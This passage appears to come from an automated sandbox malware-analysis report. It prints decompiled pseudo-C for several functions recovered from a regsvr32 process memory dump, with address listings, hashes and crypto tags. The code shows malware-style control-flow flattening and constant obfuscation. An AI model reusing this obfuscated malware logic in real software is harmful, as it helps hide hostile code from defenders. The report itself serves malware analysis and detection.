				_t407 =  &(( &_v128)[0xa]);
				_v84 = 0x407ce;
				_v88 = 0;
				_t403 = 0;
				asm("stosd");
				asm("stosd");
				asm("stosd");
				_t313 = 0x88204;
				do {
					while(_t313 != 0x468f) {
						if(_t313 == 0x251bf) {
							_v104 = 0xdd47b5;
							_v104 = _v104 << 0xb;
							_t361 = 0x24;
							_v104 = _v104 / _t361;
							_v104 = _v104 ^ 0x068a5e3d;
							_v100 = 0x70ad08;
							_t362 = 0x3d;
							_v100 = _v100 / _t362;
							_v100 = _v100 * 0x1c;
							_v100 = _v100 ^ 0x00382754;
							_v96 = 0xa2b750;
							_v96 = _v96 << 8;
							_v96 = _v96 * 0x6b;
							_v96 = _v96 ^ 0x02944ea3;
							_v92 = 0xb6baa6;
							_v92 = _v92 >> 0xf;
							_v92 = _v92 | 0x37230ce4;
							_v92 = _v92 ^ 0x3726cc4f;
							E04F78414(_v104, _v88, _v100, _v96, _v92);
						} else {
							if(_t313 == 0x5c9b2) {
								_v124 = 0xb08ca0;
								_v124 = _v124 << 3;
								_t364 = 0x5a;
								_v124 = _v124 * 0x26;
								_v124 = _v124 >> 0xb;
								_v124 = _v124 ^ 0x001037be;
								_v96 = 0xf93d8d;
								_v96 = _v96 ^ 0x97baf343;
								_v96 = _v96 ^ 0x97481c11;
								_v128 = 0xbe3faf;
								_v128 = _v128 << 8;
								_v128 = _v128 * 0x5c;
								_v128 = _v128 / _t364;
								_v128 = _v128 ^ 0x01069f6f;
								_v92 = 0xbe6065;
								_v92 = _v92 << 5;
								_v92 = _v92 ^ 0x17c0eb6f;
								_push( &_v68);
								_push(_v92);
								_push(_v128);
								_t404 = 0x44;
								_push(_t404);
								E04F6E8B9(_v124, _v96);
								_v68 = _t404;
								_v128 = 0x57d472;
								_v128 = _v128 + 0xa359;
								_t366 = 0x6b;
								_v128 = _v128 / _t366;
								_t367 = 0x37;
								_v128 = _v128 * 0x60;
								_v128 = _v128 ^ 0x0043b525;
								_v96 = 0xb1064c;
								_v96 = _v96 * 0x6f;
								_v96 = _v96 ^ 0x4cca01f3;
								_v92 = 0x37c669;
								_v92 = _v92 | 0x46bde17b;
								_v92 = _v92 ^ 0x46b672f4;
								_v124 = 0x681a0f;
								_v124 = _v124 + 0xffff88b5;
								_v124 = _v124 << 8;
								_v124 = _v124 / _t367;
								_v124 = _v124 ^ 0x01ed7c4b;
								_v60 = E04F7D6A7(_v128, _v96, _v92, 0x4f613c8, _v124);
								_v112 = 0x8629b2;
								_v112 = _v112 ^ 0xf92ad6de;
								_v112 = _v112 + 0xffffe8bd;
								_v112 = _v112 >> 0xb;
								_v112 = _v112 ^ 0x001f319d;
								_v92 = 0x1371a;
								_v92 = _v92 * 0x41;
								_v92 = _v92 * 0xb;
								_v92 = _v92 ^ 0x0364e5be;
								_v96 = 0xfc2f2a;
								_v96 = _v96 | 0xa692ca2b;
								_v96 = _v96 << 0xa;
								_v96 = _v96 ^ 0xfbb11392;
								_v100 = 0xf67c5d;
								_v100 = _v100 << 6;
								_t369 = 0x79;
								_v100 = _v100 / _t369;
								_v100 = _v100 ^ 0x0085f173;
								_v104 = 0x552d2a;
								_t124 =  &_v104; // 0x552d2a
								_t370 = 0x45;
								_v104 =  *_t124 * 0x16;
								_v104 = _v104 >> 6;
								_v104 = _v104 ^ 0x001a9df7;
								_v108 = 0xbb49cd;
								_v108 = _v108 + 0xffffc110;
								_v108 = _v108 << 0x10;
								_v108 = _v108 ^ 0x0add8e0d;
								_v116 = 0x158f13;
								_v116 = _v116 * 0x68;
								_v116 = _v116 * 0x62;
								_v116 = _v116 + 0xffff0e5b;
								_v116 = _v116 ^ 0x5a4e1790;
								_v120 = 0xf9309a;
								_v120 = _v120 + 0xffff9883;
								_v120 = _v120 | 0x64a3f953;
								_v120 = _v120 >> 3;
								_v120 = _v120 ^ 0x0c9dba12;
								_v128 = 0xc09daa;
								_v128 = _v128 * 0x7e;
								_v128 = _v128 | 0xe928b524;
								_t371 = 0x22;
								_v128 = _v128 / _t370;
								_v128 = _v128 ^ 0x03ba39cd;
								_v124 = 0xea7b17;
								_t372 = 0x3c;
								_v124 = _v124 / _t371;
								_v124 = _v124 / _t372;
								_v124 = _v124 | 0xaf994779;
								_v124 = _v124 ^ 0xaf9b4390;
								_t355 = E04F6E70F(_t372,  &_v68, _a16, _v92 | _v112, _v88, _v96, _v100, _t372, _v104, _t372, _a20, _v108, _v116, 0, _v120, _a12, _t372, _v128, _v124);
								_v104 = 0xf1480b;
								_t403 = _t355;
								_v104 = _v104 | 0x3df25ec8;
								_v104 = _v104 ^ 0x3dffdcab;
								_v96 = 0xe16e7;
								_v96 = _v96 + 0xffff892f;
								_v96 = _v96 >> 7;
								_v96 = _v96 ^ 0x0002f972;
								_v92 = 0xb647f3;
								_t373 = 0x7a;
								_v92 = _v92 / _t373;
								_v92 = _v92 | 0xcc8ea2c1;
								_v92 = _v92 ^ 0xcc8bd462;
								_v100 = 0x2bc739;
								_v100 = _v100 ^ 0x5fc7c204;
								_v100 = _v100 ^ 0x5fe6aa2e;
								_t360 = _v104;
								E04F6845B(_v104, _v96, _v92, _v100, _v60);
								_t407 =  &(_t407[0x1b]);
								_t313 = 0x251bf;
								continue;
							} else {
								if(_t313 != 0x88204) {
									goto L10;
								} else {
									_t313 = 0x468f;
									continue;
								}
							}
						}
						L13:
						return _t403;
					}
					_v116 = 0x9b9703;
					_v116 = _v116 * 0x49;
					_v116 = _v116 + 0xffffdf61;
					_v116 = _v116 + 0x1175;
					_v116 = _v116 ^ 0x2c572484;
					_v112 = 0x45d04b;
					_v112 = _v112 + 0xffffaea0;
					_v112 = _v112 | 0xe7ffff7e;
					_v112 = _v112 ^ 0xe7f626ea;
					_v96 = 0xdb3465;
					_v96 = _v96 + 0x2441;
					_v96 = _v96 + 0x88fc;
					_v96 = _v96 ^ 0x00d9d405;
					_v92 = 0xa82303;
					_v92 = _v92 * 0x6e;
					_v92 = _v92 << 0xa;
					_v92 = _v92 ^ 0xfc218a16;
					_t317 = E04F65875(_t360, _v116, _v112, _v96, _v92,  &_v88, _a16);
					_t407 =  &(_t407[5]);
					if(_t317 == 0) {
						_t313 = 0xb6a75;
						goto L10;
					} else {
						_t313 = 0x5c9b2;
						continue;
					}
					goto L13;
					L10:
				} while (_t313 != 0xb6a75);
				goto L13;
			}

0x04f6260b
0x04f62615
0x04f6261e
0x04f6261f
0x04f62626
0x04f6262d
0x04f62634
0x04f6263b
0x04f6263c
0x04f62643
0x04f62644
0x04f62645
0x04f6264a
0x04f6264d
0x04f62657
0x04f6265f
0x04f62661
0x04f62667
0x04f62668
0x04f62669
0x04f62673
0x04f62673
0x04f62680
0x04f62b1d
0x04f62b27
0x04f62b32
0x04f62b37
0x04f62b3d
0x04f62b45
0x04f62b51
0x04f62b54
0x04f62b5d
0x04f62b61
0x04f62b69
0x04f62b71
0x04f62b7b
0x04f62b7f
0x04f62b87
0x04f62b8f
0x04f62b94
0x04f62b9c
0x04f62bb8
0x04f62686
0x04f62688
0x04f62699
0x04f626a3
0x04f626af
0x04f626b0
0x04f626b4
0x04f626b9
0x04f626c1
0x04f626c9
0x04f626d1
0x04f626d9
0x04f626e1
0x04f626eb
0x04f626f5
0x04f626fd
0x04f62705
0x04f6270d
0x04f62712
0x04f6271a
0x04f6271b
0x04f6271f
0x04f6272d
0x04f6272e
0x04f6272f
0x04f62734
0x04f6273a
0x04f62742
0x04f62750
0x04f62755
0x04f62760
0x04f62761
0x04f62765
0x04f6276d
0x04f6277a
0x04f6277e
0x04f62786
0x04f6278e
0x04f62796
0x04f6279e
0x04f627a6
0x04f627ae
0x04f627b9
0x04f627bd
0x04f627df
0x04f627e6
0x04f627ee
0x04f627f6
0x04f627fe
0x04f62803
0x04f6280b
0x04f62818
0x04f62821
0x04f62825
0x04f6282d
0x04f62837
0x04f6283f
0x04f62844
0x04f6284c
0x04f62854
0x04f6285f
0x04f62864
0x04f6286a
0x04f62872
0x04f6287a
0x04f6287f
0x04f62882
0x04f62886
0x04f6288b
0x04f62893
0x04f6289b
0x04f628a3
0x04f628a8
0x04f628b0
0x04f628bd
0x04f628c6
0x04f628ca
0x04f628d2
0x04f628da
0x04f628e2
0x04f628ea
0x04f628f2
0x04f628f7
0x04f628ff
0x04f6290c
0x04f62910
0x04f6291e
0x04f6291f
0x04f62925
0x04f6292d
0x04f6293d
0x04f6293e
0x04f6294e
0x04f62952
0x04f6295a
0x04f629a8
0x04f629ad
0x04f629b5
0x04f629b7
0x04f629c1
0x04f629c9
0x04f629d1
0x04f629d9
0x04f629de
0x04f629e6
0x04f629f4
0x04f629f7
0x04f629fb
0x04f62a03
0x04f62a0b
0x04f62a13
0x04f62a1b
0x04f62a3c
0x04f62a40
0x04f62a45
0x04f62a48
0x00000000
0x04f6268a
0x04f6268f
0x00000000
0x04f62695
0x04f62695
0x00000000
0x04f62695
0x04f6268f
0x04f62688
0x04f62bc1
0x04f62bcc
0x04f62bcc
0x04f62a52
0x04f62a66
0x04f62a6a
0x04f62a72
0x04f62a7a
0x04f62a82
0x04f62a8a
0x04f62a92
0x04f62a9a
0x04f62aa2
0x04f62aaa
0x04f62ab2
0x04f62aba
0x04f62ac2
0x04f62acf
0x04f62ad7
0x04f62adc
0x04f62af5
0x04f62afa
0x04f62aff
0x04f62b08
0x00000000
0x04f62b01
0x04f62b01
0x00000000
0x04f62b01
0x00000000
0x04f62b0d
0x04f62b0d
0x00000000

Strings

*-U, xrefs: 04F6287A
A$, xrefs: 04F62AAA

Memory Dump Source

Source File: 00000002.00000002.415134102.0000000004F61000.00000020.00001000.00020000.00000000.sdmp, Offset: 04F60000, based on PE: true

Associated: 00000002.00000002.415129850.0000000004F60000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.415356193.0000000004F82000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_4f60000_regsvr32.jbxd

Yara matches

Similarity

API ID:
String ID: *-U$A$
API String ID: 0-944957311
Opcode ID: ed03161aeb9e6f25353017d20f538f0441056828f6201ce8760aecdaa9e9db8b
Instruction ID: d58c511e8a830d410747d4e6e344296b5fe43fe2483ce65b001bd1a7c8da03e4
Opcode Fuzzy Hash: ed03161aeb9e6f25353017d20f538f0441056828f6201ce8760aecdaa9e9db8b
Instruction Fuzzy Hash: FBE1F071509340AFD398DF24D98990BBBE2FBC8B48F405A1DF1D9A6260D3B59A09CF47

Uniqueness

Uniqueness Score: -1.00%

Function 04F68DA4 Relevance: 2.7, Strings: 2, Instructions: 237
COMMONCrypto

Download Yara Rule

C-Code - Quality: 94%

			E04F68DA4(intOrPtr* __ecx, void* __edx, signed int _a4, intOrPtr _a8, intOrPtr* _a12) {
				intOrPtr _v24;
				char _v28;
				char _v44;
				intOrPtr _v48;
				intOrPtr _v52;
				intOrPtr _v56;
				char _v64;
				signed int _v68;
				char _v72;
				signed int _v76;
				signed int _v80;
				signed int _v84;
				signed int _v88;
				void* _t199;
				void* _t201;
				signed int _t204;
				signed int _t210;
				signed int _t218;
				void* _t221;
				intOrPtr _t226;
				intOrPtr* _t232;
				signed int _t235;
				signed int _t238;
				signed int _t239;
				signed int _t243;
				signed int _t248;
				signed int _t250;
				signed int _t252;
				intOrPtr _t270;
				void* _t272;
				signed int _t273;
				signed int _t274;
				intOrPtr* _t275;
				signed int* _t277;

				_t232 = _a12;
				_push(_t232);
				_push(_a8);
				_t275 = __ecx;
				_push(_a4);
				_push(__edx);
				_push(__ecx);
				E04F732C4(_t199);
				_t277 =  &(( &_v88)[5]);
				_v56 = 0x4dcfd;
				_t270 = 0;
				_t201 = 0x5351a;
				_v52 = 0;
				_t272 = 0x7f8af;
				_v48 = 0;
				while(_t201 != 0x5351a) {
					if(_t201 == 0x6388f) {
						_v76 = 0xc3ef21;
						_v76 = _v76 >> 0xd;
						_v76 = _v76 + 0x4099;
						_v76 = _v76 ^ 0x00084966;
						_v80 = 0x218866;
						_v80 = _v80 + 0xffff7aad;
						_v80 = _v80 << 0x10;
						_v80 = _v80 ^ 0x0310bd98;
						_v84 = 0x9c1ccc;
						_v84 = _v84 | 0x8fde395f;
						_v84 = _v84 ^ 0x8fd41652;
						_v88 = 0x8697a6;
						_v88 = _v88 * 0x29;
						_v88 = _v88 + 0xffff8127;
						_v88 = _v88 + 0xffff4e23;
						_v88 = _v88 ^ 0x1581f72f;
						_t204 = E04F74D2B( &_v64,  &_v72, _v76, _v80, _v84, _v88);
						_t277 =  &(_t277[4]);
						__eflags = _t204;
						if(_t204 == 0) {
							L27:
							return _t270;
						}
						_t201 = 0xb9cd4;
						continue;
					}
					if(_t201 == 0x7cb82) {
						_v72 =  *_t275;
						_v68 = _a4;
						_v88 = 0xb5682;
						_v88 = _v88 | 0x6c18a43b;
						_v88 = _v88 >> 0xd;
						_t235 = 0x70;
						_v88 = _v88 / _t235;
						_v88 = _v88 ^ 0x000007b9;
						_t238 = _v72 + _v68 - _v88;
						while(1) {
							__eflags = _t238 - _v72;
							if(_t238 <= _v72) {
								break;
							}
							__eflags =  *_t238;
							if( *_t238 == 0) {
								break;
							}
							_t238 = _t238 - 1;
							__eflags = _t238;
						}
						_t239 = _t238 - _v72;
						__eflags = _t239;
						_v68 = _t239;
						if(_t239 == 0) {
							L20:
							_t201 = 0x6388f;
							continue;
						} else {
							goto L17;
						}
						while(1) {
							L17:
							_v84 = 0xd2900b;
							_v84 = _v84 << 6;
							_v84 = _v84 ^ 0xaa19e8cc;
							_v84 = _v84 ^ 0x9ebdea1c;
							_t252 = _v84;
							_t273 = _v68;
							_t210 = _t273;
							__eflags = _t210 % _t252;
							if(_t210 % _t252 == 0) {
								break;
							}
							_t274 = _t273 - 1;
							__eflags = _t274;
							_v68 = _t274;
							if(_t274 != 0) {
								continue;
							}
							break;
						}
						_t272 = 0x7f8af;
						goto L20;
					}
					if(_t201 == _t272) {
						_v80 = 0xb7bbd3;
						_v80 = _v80 ^ 0x0985ac76;
						_v80 = _v80 + 0xffff2acf;
						_v80 = _v80 ^ 0x093f04af;
						_v88 = 0xe1b756;
						_v88 = _v88 >> 7;
						_v88 = _v88 ^ 0x68f3c196;
						_v88 = _v88 * 0x17;
						_v88 = _v88 ^ 0x6dbd8fcc;
						_v76 = 0xd64489;
						_v76 = _v76 >> 0xc;
						_v76 = _v76 + 0xffffc030;
						_t193 =  &_v76;
						 *_t193 = _v76 ^ 0xfff38497;
						__eflags =  *_t193;
						E04F7E4B2(_v80, _v88,  *_t193, _v76, _v64);
						goto L27;
					}
					if(_t201 == 0xb9cd4) {
						_v80 = 0x62c85a;
						_v80 = _v80 >> 7;
						_v80 = _v80 ^ 0x00016714;
						_v88 = 0x13ef4b;
						_v88 = _v88 << 0xd;
						_v88 = _v88 + 0xffff09e6;
						_v88 = _v88 ^ 0x7dee6c60;
						_v76 = 0x6a3223;
						_t243 = 0x59;
						_v76 = _v76 * 0x30;
						_v76 = _v76 ^ 0x13e3577f;
						_v84 = 0xee123e;
						_v84 = _v84 / _t243;
						_v84 = _v84 | 0x1feae0c4;
						_v84 = _v84 ^ 0x1fe0d071;
						_t218 = E04F6A203(_v80,  &_v64, _v88, _v76, _v84,  &_v44);
						_t277 =  &(_t277[4]);
						asm("sbb eax, eax");
						_t201 = ( ~_t218 & 0x0007f543) + _t272;
						continue;
					}
					if(_t201 != 0xfedf2) {
						L24:
						__eflags = _t201 - 0x19dc6;
						if(_t201 != 0x19dc6) {
							continue;
						}
						goto L27;
					}
					_v80 = 0xcebf5c;
					_v80 = _v80 | 0x4d233105;
					_v80 = _v80 ^ 0x4de18478;
					_v76 = 0x9f49dc;
					_v76 = _v76 ^ 0xeaae71a5;
					_v76 = _v76 ^ 0xea38d7d2;
					_t221 = E04F7C234( &_v44,  &_v28, _v80, _v76);
					_t285 = _t221;
					if(_t221 != 0) {
						_v80 = 0x9f42f5;
						_t248 = 0x30;
						_push(_t248);
						_v80 = _v80 / _t248;
						_v80 = _v80 ^ 0x000f526c;
						_v76 = 0x172296;
						_v76 = _v76 + 0xffff2189;
						_v76 = _v76 ^ 0x0018de4b;
						_t226 = E04F73EE6(_t248, _v24, _t285);
						 *_t232 = _t226;
						if(_t226 != 0) {
							_v76 = 0xfc6738;
							_v76 = _v76 >> 4;
							_v76 = _v76 ^ 0x000e4a07;
							_v84 = 0x82fd3;
							_t250 = 0x6b;
							_v84 = _v84 * 0x5a;
							_v84 = _v84 >> 2;
							_v84 = _v84 ^ 0x00b6ce78;
							_v88 = 0xf6d87a;
							_v88 = _v88 + 0x23c5;
							_v88 = _v88 / _t250;
							_v88 = _v88 ^ 0x0004c08f;
							E04F6C8F0( *_t232, _v76, _v84, _v28, _v24, _v88);
							_t277 =  &(_t277[4]);
							 *((intOrPtr*)(_t232 + 4)) = _v24;
							_t270 = 1;
						}
					}
					_t201 = _t272;
				}
				_t201 = 0x7cb82;
				goto L24;
			}

0x04f68da8
0x04f68daf
0x04f68db0
0x04f68db4
0x04f68db6
0x04f68dba
0x04f68dbb
0x04f68dbc
0x04f68dc1
0x04f68dc4
0x04f68dcc
0x04f68dce
0x04f68dd3
0x04f68dd7
0x04f68ddc
0x04f68de0
0x04f68df0
0x04f69093
0x04f6909f
0x04f690a8
0x04f690b0
0x04f690b8
0x04f690c0
0x04f690c8
0x04f690cd
0x04f690d5
0x04f690dd
0x04f690e5
0x04f690ed
0x04f690fa
0x04f690fe
0x04f69106
0x04f6910e
0x04f69126
0x04f6912b
0x04f6912e
0x04f69130
0x04f691cc
0x04f691d5
0x04f691d5
0x04f69136
0x00000000
0x04f69136
0x04f68dfb
0x04f68ff3
0x04f68ffa
0x04f68ffe
0x04f69006
0x04f6900e
0x04f69019
0x04f6901c
0x04f69020
0x04f69034
0x04f6903e
0x04f6903e
0x04f69042
0x00000000
0x00000000
0x04f69038
0x04f6903b
0x00000000
0x00000000
0x04f6903d
0x04f6903d
0x04f6903d
0x04f69044
0x04f69044
0x04f69048
0x04f6904c
0x04f69089
0x04f69089
0x00000000
0x00000000
0x00000000
0x00000000
0x04f6904e
0x04f6904e
0x04f6904e
0x04f69058
0x04f6905d
0x04f69065
0x04f6906d
0x04f69071
0x04f69075
0x04f69079
0x04f6907b
0x00000000
0x00000000
0x04f6907d
0x04f6907d
0x04f6907e
0x04f69082
0x00000000
0x00000000
0x00000000
0x04f69082
0x04f69084
0x00000000
0x04f69084
0x04f68e03
0x04f69152
0x04f6915a
0x04f69162
0x04f6916a
0x04f69172
0x04f6917a
0x04f6917f
0x04f6918c
0x04f69190
0x04f69198
0x04f691a0
0x04f691a5
0x04f691ad
0x04f691ad
0x04f691ad
0x04f691c5
0x00000000
0x04f691cb
0x04f68e0e
0x04f68f4b
0x04f68f55
0x04f68f5a
0x04f68f62
0x04f68f6a
0x04f68f6f
0x04f68f77
0x04f68f7f
0x04f68f8e
0x04f68f8f
0x04f68f93
0x04f68f9b
0x04f68fad
0x04f68fb5
0x04f68fbd
0x04f68fd6
0x04f68fdb
0x04f68fe0
0x04f68fe7
0x00000000
0x04f68fe7
0x04f68e19
0x04f69145
0x04f69145
0x04f6914a
0x00000000
0x00000000
0x00000000
0x04f69150
0x04f68e1f
0x04f68e2b
0x04f68e37
0x04f68e3f
0x04f68e47
0x04f68e4f
0x04f68e5f
0x04f68e66
0x04f68e68
0x04f68e6e
0x04f68e7e
0x04f68e81
0x04f68e82
0x04f68e86
0x04f68e8e
0x04f68e96
0x04f68e9e
0x04f68eb2
0x04f68eb7
0x04f68ebc
0x04f68ec2
0x04f68ecc
0x04f68ed1
0x04f68ed9
0x04f68ee8
0x04f68ee9
0x04f68eed
0x04f68ef2
0x04f68efa
0x04f68f02
0x04f68f10
0x04f68f14
0x04f68f32
0x04f68f3d
0x04f68f40
0x04f68f43
0x04f68f43
0x04f68ebc
0x04f68f44
0x04f68f44
0x04f69140
0x00000000

Strings

`l}, xrefs: 04F68F77
#2j, xrefs: 04F68F7F

Memory Dump Source

Source File: 00000002.00000002.415134102.0000000004F61000.00000020.00001000.00020000.00000000.sdmp, Offset: 04F60000, based on PE: true

Associated: 00000002.00000002.415129850.0000000004F60000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.415356193.0000000004F82000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_4f60000_regsvr32.jbxd

Yara matches

Similarity

API ID:
String ID: #2j$`l}
API String ID: 0-1443445036
Opcode ID: f59b917d12b3420ab7d0a225da22d0817f189c0e7ff301f057dcbcc19cc43bda
Instruction ID: 5206051e8e93ac55c72e225c82b9866ea17536d358429fc1d56457cc428ec3c6
Opcode Fuzzy Hash: f59b917d12b3420ab7d0a225da22d0817f189c0e7ff301f057dcbcc19cc43bda
Instruction Fuzzy Hash: D9B10FB19083429FC318DF25D94981BBBE1FBD8748F004D1DF19696260D7B5EA4ACF82

Uniqueness

Uniqueness Score: -1.00%

Function 04F7FFAC Relevance: 2.7, Strings: 2, Instructions: 212
COMMONCrypto

Download Yara Rule

C-Code - Quality: 96%

			E04F7FFAC(void* __edx, signed int _a4) {
				intOrPtr _v8;
				intOrPtr _v16;
				intOrPtr _v24;
				char _v32;
				intOrPtr _v40;
				char _v56;
				char _v88;
				signed int _v92;
				signed int _v96;
				intOrPtr _v100;
				intOrPtr _v104;
				char _v112;
				signed int _v116;
				signed int _v120;
				signed int _v124;
				signed int _v128;
				void* __ecx;
				void* _t116;
				void* _t118;
				signed int _t127;
				intOrPtr _t157;
				signed int _t160;
				signed int _t165;
				signed int _t166;
				intOrPtr* _t180;
				intOrPtr* _t181;
				signed int* _t184;
				void* _t186;

				_push(_a4);
				_push(__edx);
				E04F732C4(_t116);
				_v96 = _v96 & 0x00000000;
				_t184 =  &(( &_v128)[3]);
				_v92 = _v92 & 0x00000000;
				_t118 = 0x920bf;
				_t181 = _v116;
				_t180 = _v116;
				_v104 = 0x7b9c5;
				_v100 = 0x7e16c;
				while(1) {
					_t186 = _t118 - 0x9fe5b;
					if(_t186 > 0) {
						goto L25;
					}
					L2:
					if(_t186 == 0) {
						_v124 = 0xa46b4c;
						_v124 = _v124 >> 7;
						_v124 = _v124 + 0xffffb10a;
						_v124 = _v124 ^ 0x00047701;
						_v128 = 0x6da9b2;
						_v128 = _v128 | 0x65a8893f;
						_v128 = _v128 + 0xffff2e6d;
						_v128 = _v128 ^ 0x65ea8028;
						_t173 = _v128;
						__eflags = E04F6D362(_v124, _v128, __eflags,  &_v88,  &_v112);
						if(__eflags == 0) {
							L42:
							return _t180;
						}
						L24:
						_t118 = 0xb9a1b;
						continue;
						do {
							while(1) {
								_t186 = _t118 - 0x9fe5b;
								if(_t186 > 0) {
									goto L25;
								}
								goto L2;
							}
							L41:
							__eflags = _t118 - 0x46f41;
						} while (__eflags != 0);
						goto L42;
					}
					if(_t118 == 0x2b276) {
						__eflags = _v16 - 5;
						if(__eflags == 0) {
							_t173 = _t181;
							E04F73711( &_v32, _t181);
							L15:
							_t118 = 0x38049;
							while(1) {
								_t186 = _t118 - 0x9fe5b;
								if(_t186 > 0) {
									goto L25;
								}
								goto L2;
							}
							goto L25;
						}
						_t118 = 0x66f81;
						continue;
					}
					if(_t118 == 0x38049) {
						_t157 =  *0x4f82218; // 0x33fd1f0
						_t180 = _t180 + 1;
						__eflags = _t180;
						 *((intOrPtr*)(_t181 + 0x24)) =  *((intOrPtr*)(_t157 + 0x224));
						 *((intOrPtr*)(_t157 + 0x224)) = _t181;
						L19:
						_t118 = 0x9fe5b;
						continue;
					}
					if(_t118 == 0x66f81) {
						__eflags = _v16 - 6;
						if(__eflags == 0) {
							E04F63023( &_v32);
						}
						goto L15;
					}
					if(_t118 == 0x7b7b2) {
						__eflags = _v16 - 1;
						if(__eflags == 0) {
							E04F701BF( &_v32, _t173);
							goto L15;
						}
						_t118 = 0xaa33f;
						continue;
					}
					if(_t118 == 0x7eaea) {
						_v128 = 0x243b9;
						_v128 = _v128 >> 2;
						_v128 = _v128 ^ 0x000f277b;
						_v124 = 0x254f98;
						_t160 = 0x16;
						_push(_t160);
						_v124 = _v124 / _t160;
						_v124 = _v124 ^ 0x00038530;
						_t173 = 0x40;
						_t181 = E04F73EE6(_t160, _t173, __eflags);
						__eflags = _t181;
						if(__eflags == 0) {
							goto L24;
						}
						 *((intOrPtr*)(_t181 + 0x20)) = _v24;
						 *((intOrPtr*)(_t181 + 0x38)) = _v8;
						 *_t181 = _v40;
						_t118 = 0x7b7b2;
						continue;
					}
					if(_t118 != 0x920bf) {
						goto L41;
					}
					_t173 = _a4;
					_v124 = 0xb2179f;
					_t180 = 0;
					_v124 = _v124 >> 8;
					_v124 = _v124 ^ 0x000efdfd;
					_v128 = 0xf47784;
					_v128 = _v128 + 0x396d;
					_v128 = _v128 + 0x2927;
					_v128 = _v128 ^ 0x00f4a0b6;
					E04F80484(_v124, _a4,  &_v88, _v128);
					_t118 = 0xfeeac;
					continue;
					L25:
					__eflags = _t118 - 0xaa33f;
					if(_t118 == 0xaa33f) {
						__eflags = _v16 - 2;
						if(__eflags == 0) {
							E04F6B704( &_v32, _t181);
							_t118 = 0x38049;
							goto L41;
						}
						_t118 = 0xe25f5;
						continue;
					}
					__eflags = _t118 - 0xb9a1b;
					if(_t118 == 0xb9a1b) {
						_v116 = 0xdbec23;
						_t165 = 0x5b;
						_v116 = _v116 / _t165;
						_v116 = _v116 ^ 0x00090af0;
						_v124 = 0x763668;
						_v124 = _v124 | 0x1a5e8404;
						_v124 = _v124 >> 3;
						_v124 = _v124 ^ 0x034b9fdd;
						_v120 = 0x5b4e9f;
						_t166 = 0x55;
						_v120 = _v120 / _t166;
						_v120 = _v120 ^ 0x000700bb;
						_v128 = 0x91c73f;
						_v128 = _v128 ^ 0x9443a69b;
						_v128 = _v128 ^ 0x94dfcb29;
						_t173 = _v124;
						_t127 = E04F7F7FE(_v116, _v124,  &_v112, _v120, _v128,  &_v56);
						_t184 =  &(_t184[4]);
						asm("sbb eax, eax");
						_t118 = ( ~_t127 & 0xfffdec8f) + 0x9fe5b;
						continue;
					}
					__eflags = _t118 - 0xe25f5;
					if(_t118 == 0xe25f5) {
						__eflags = _v16 - 3;
						if(__eflags == 0) {
							E04F6CED3( &_v32);
							goto L15;
						}
						_t118 = 0xedf00;
						continue;
					}
					__eflags = _t118 - 0xedf00;
					if(_t118 == 0xedf00) {
						__eflags = _v16 - 4;
						if(__eflags == 0) {
							E04F78FB0( &_v32);
							goto L15;
						}
						_t118 = 0x2b276;
						continue;
					}
					__eflags = _t118 - 0xfeeac;
					if(_t118 != 0xfeeac) {
						goto L41;
					}
					E04F6A7C4(_t118, 0);
					goto L19;
				}
			}

0x04f7ffb6
0x04f7ffbd
0x04f7ffbf
0x04f7ffc4
0x04f7ffc9
0x04f7ffcc
0x04f7ffd1
0x04f7ffd6
0x04f7ffdf
0x04f7ffe8
0x04f7fff0
0x04f7fff8
0x04f7fff8
0x04f7fffa
0x00000000
0x00000000
0x04f80000
0x04f80000
0x04f80185
0x04f80191
0x04f80196
0x04f8019e
0x04f801a6
0x04f801ae
0x04f801b6
0x04f801be
0x04f801c6
0x04f801db
0x04f801dd
0x04f80339
0x04f80345
0x04f80345
0x04f801e3
0x04f801e3
0x04f801e8
0x04f7fff8
0x04f7fff8
0x04f7fff8
0x04f7fffa
0x00000000
0x00000000
0x00000000
0x04f7fffa
0x04f8032e
0x04f8032e
0x04f8032e
0x00000000
0x04f7fff8
0x04f8000b
0x04f80164
0x04f8016c
0x04f80178
0x04f8017e
0x04f8012b
0x04f8012b
0x04f7fff8
0x04f7fff8
0x04f7fffa
0x00000000
0x00000000
0x00000000
0x04f7fffa
0x00000000
0x04f7fff8
0x04f8016e
0x00000000
0x04f8016e
0x04f80013
0x04f80147
0x04f8014d
0x04f8014d
0x04f80154
0x04f80157
0x04f8015d
0x04f8015d
0x00000000
0x04f8015d
0x04f8001e
0x04f80132
0x04f8013a
0x04f80140
0x04f80140
0x00000000
0x04f8013a
0x04f80029
0x04f8010e
0x04f80116
0x04f80126
0x00000000
0x04f80126
0x04f80118
0x00000000
0x04f80118
0x04f80034
0x04f8009d
0x04f800a7
0x04f800ac
0x04f800b4
0x04f800c2
0x04f800c5
0x04f800c6
0x04f800ca
0x04f800dc
0x04f800e2
0x04f800e5
0x04f800e7
0x00000000
0x00000000
0x04f800f1
0x04f800fb
0x04f80102
0x04f80104
0x00000000
0x04f80104
0x04f8003b
0x00000000
0x00000000
0x04f80041
0x04f8004c
0x04f80054
0x04f80056
0x04f8005b
0x04f80063
0x04f8006b
0x04f80073
0x04f8007b
0x04f8008c
0x04f80093
0x00000000
0x04f801ed
0x04f801ed
0x04f801f2
0x04f8030d
0x04f80315
0x04f80327
0x04f8032c
0x00000000
0x04f8032c
0x04f80317
0x00000000
0x04f80317
0x04f801f8
0x04f801fd
0x04f80268
0x04f80278
0x04f8027d
0x04f80283
0x04f8028b
0x04f80293
0x04f8029b
0x04f802a0
0x04f802a8
0x04f802b4
0x04f802b7
0x04f802bf
0x04f802c7
0x04f802cf
0x04f802d7
0x04f802ec
0x04f802f5
0x04f802fa
0x04f802ff
0x04f80306
0x00000000
0x04f80306
0x04f801ff
0x04f80204
0x04f80246
0x04f8024e
0x04f8025e
0x00000000
0x04f8025e
0x04f80250
0x00000000
0x04f80250
0x04f80206
0x04f8020b
0x04f80224
0x04f8022c
0x04f8023c
0x00000000
0x04f8023c
0x04f8022e
0x00000000
0x04f8022e
0x04f8020d
0x04f80212
0x00000000
0x00000000
0x04f8021a
0x00000000
0x04f8021a

Strings

'), xrefs: 04F80073
h6v, xrefs: 04F8028B

Memory Dump Source

